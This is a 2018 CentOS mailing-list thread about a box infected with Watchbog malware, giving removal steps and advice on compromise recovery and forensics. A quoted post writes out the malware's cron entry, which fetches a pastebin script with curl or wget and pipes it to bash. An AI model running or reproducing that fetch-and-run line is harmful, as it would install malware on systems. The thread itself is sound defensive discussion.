[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Tue Dec 18 15:49:01 UTC 2018
Valeri Galtsev <galtsev at kicp.uchicago.edu>

On 12/18/18 8:31 AM, mark wrote:
> Valeri Galtsev wrote:
>> On 12/17/18 2:57 PM, Mauricio Tavares wrote:
>>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
>>> <kaushalshriyan at gmail.com> wrote:
>>>> Is there a way to find out how the CentOS 7.5 Linux box got infected
>>>> with malware? Currently i am referring to
>>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>>>> to carry out the below steps and is done manually.
>>>> 1)rm -fr /tmp/*timesyncc.service*
>>>> 2)crontab -e -u apigee
>>>> delete the cron entry */1 * * * * (curl -fsSL
>>>> https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>>>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>>> 3)ps aux | grep watchbog
>>>> kill -9 pidof watchbog
>>>> Any suggestions or recommendations to find out how CentOS 7.5 Linux
>>>> box got infected with Watchbog Malware. Is there any open source
>>>> software which can
>>> do you have untampered log files?
>>>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
>> Standard compromise recovery procedure since forever is (your local
>> policy may have slightly different order about notifications and similar):
>> 1. back up all user data
> You should have been doing that all along.

Do not exclude this from the [more or less] full list of the standard 
compromise recovery routine I tried to outline. Even though you had to 
do backups all the time, a backup at this point may have the latest changes 
not present in the latest routine backup. And when did you last have to restore 
something from your backup, how many years ago? So your knowledge that 
that backup indeed works was tested years ago...

> First step, before you do anything else, is pull the hard drive, put it
> into a hot-swap or external bay, and dd the entire drive to an identical
> one. THAT goes to forensics.

Indeed. Or adjust this part to "everything is hosted on a hardware RAID 
device", for which you will have to boot off DVD, mount, and dump it all 
elsewhere for forensics.

But! Forensics is a different and sophisticated story, and when you learn 
it in depth, the first thing you will learn is: powering off the 
system, or even just disconnecting it from the network, may totally prevent 
you from learning several things about the compromise. But this is 
a really huge subject...

> Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
> settings - that includes pulling the battery... *then* set what you need,
> and then build it new, and restore from backups.
> <snip>
> Why, yes, we did just do this, um, last year, after a compromise via a
> WordPress security hole. It did not manage to get to any other systems (we
> checked, and only a few run WordPress).

And yes, preventing, no matter how tedious it may seem, is orders of 
magnitude easier than recovering from a compromise. So: secure the box. 
And update, update, update....


>        mark
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos

Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247